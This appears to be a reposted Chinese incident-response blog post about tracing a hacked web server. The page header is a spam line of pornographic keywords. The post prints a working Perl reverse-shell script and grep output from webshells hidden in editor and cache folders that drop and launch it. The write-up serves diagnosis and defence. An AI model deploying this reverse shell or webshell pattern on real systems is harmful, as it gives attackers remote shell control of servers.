日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

Web服务器捉虫速记

發布時間:2023/11/29 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Web服务器捉虫速记 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

一服務器疑似被掛馬,現象是從百度搜該站點,出來的結果大部分為色情網站。?

馬上登錄服務器(半夜好困啊)。執行如下的步驟: <!--[if !supportLists]-->1、?<!--[endif]-->檢查系統帳號,看有沒有異常帳號--如冒充系統帳號,改一個字母,看起來像系統帳號,混淆視聽。有的家伙狡猾的干活,創建個帳號為“…”極端不易察覺。 <!--[if !supportLists]-->2、?<!--[endif]-->檢查最近登錄用戶的ip:last 查看9月9號以后到目前的情況,經確認,有一個ip來路不對。 <!--[if !supportLists]-->3、?<!--[endif]-->檢查系統初始化文件inittab,運行級別為3,為發現異常。一些hacker喜歡在這里下手,加上respawn這樣的行,保證他的程序被殺后自動重啟,不屈不撓地抗爭系統管理員的絞殺。 <!--[if !supportLists]-->4、?<!--[endif]-->檢查運行級別目錄的腳本,ls –al /etc/rc3.d ,未見異常。 <!--[if !supportLists]-->5、?<!--[endif]-->檢查自動任務 crontab –l ,root用戶和web運行用戶www各檢查一遍,未見任何異常。 <!--[if !supportLists]-->6、?<!--[endif]-->檢查歷史記錄history 發現有安裝sendmail的情形,問客戶是否有這個,答:不是自己裝的。 <!--[if !supportLists]-->7、?<!--[endif]-->檢查web目錄,發現其權限為777,這可讓人不太放心了,心中猜想,可能是從這里下手了。 <!--[if !supportLists]-->8、?<!--[endif]-->檢查一下目錄/tmp,發現有個文件不太對勁,文件名是spider_bc,打開看一下,是個perl腳本,其內容為:

[root@localhost mysql]# more?/tmp/spider_bc #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo"`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR);
據客戶開發人員反應,這文件刪除以后,一會又自動生成了。 <!--[if !supportLists]-->9、?<!--[endif]-->初步懷疑是hacker利用web權限設置及程序漏洞上傳了程序后,自動生成這個文件,于是進入到網站根目錄,然后執行grep –r “spider” * ,片刻,結果出來了,下面節錄部分:

[root@localhost www]# grep spider_bc * -r /plusbak/viev.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /plusbak/viev.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /plusbak/viev.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /plusbak/viev.php:@unlink('/tmp/spider_bc.c'); /plusbak/viev.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/FCKeditor/editor/skins/images/images.php:echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /developers/FCKeditor/editor/skins/images/images.php:@unlink('/tmp/spider_bc.c'); /developers/FCKeditor/editor/skins/images/images.php:echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc',base64_decode($back_connect_pl),'wb') ? '創建/tmp/spider_bc成功<br>' : '創建/tmp/spider_bc失敗<br>'; /developers/developers/cache/default/index_sql.php :echo Exec_Run($perlpath.' /tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗'; /developers/developers/cache/default/index_sql.php :echo File_Write('/tmp/spider_bc.c',base64_decode($back_connect_c),'wb') ? '創建/tmp/spider_bc.c成功<br>' : '創建/tmp/spider_bc.c失敗<br>'; /developers/developers/cache/default/index_sql.php :@unlink('/tmp/spider_bc.c'); /developers/developers/cache/default/index_sql.php :echo Exec_Run('/tmp/spider_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -l -n -v -p '.$_POST['yourport'] : '執行命令失敗';
9、問題基本查明,告知各方,先簡單恢復,明日再戰。 本文出自 “sery” 博客,請務必保留此出處http://sery.blog.51cto.com/10037/666829 創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的Web服务器捉虫速记的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。